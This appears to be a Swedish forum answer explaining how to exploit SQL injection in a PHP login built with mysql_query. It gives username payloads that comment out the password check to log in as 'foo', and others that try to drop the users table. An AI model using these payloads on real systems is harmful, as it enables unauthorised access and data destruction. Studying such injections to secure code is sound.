Något liknande detta borde göra:
- För att logga in som användare "foo", ställ in användarnamnet på "foo" -- "
Detta kommer att få din fråga att se ut
$res = mysql_query("SELECT * from users where user='foo' -- ' AND pass=''");
"--" betyder att resten av raden har kommenterats bort
- Osäker på om detta kommer att fungera men försök ställa in användarnamnet till "foo" ELLER (DROP TABLE users) -- "
Detta kommer att få din fråga att se ut så här:
$res = mysql_query("SELECT * from users where user='foo' OR (DROP TABLE users) -- ' AND pass=''");
kanske inte accepterar det dock - jag tror att underfrågor bara kan VÄLJA.
Mysql_query-funktionen kommer bara att köra en fråga - andra skulle låta dig göra detta:
$res = mysql_query("SELECT * from users where user='foo'; DROP TABLE users -- ' AND pass=''");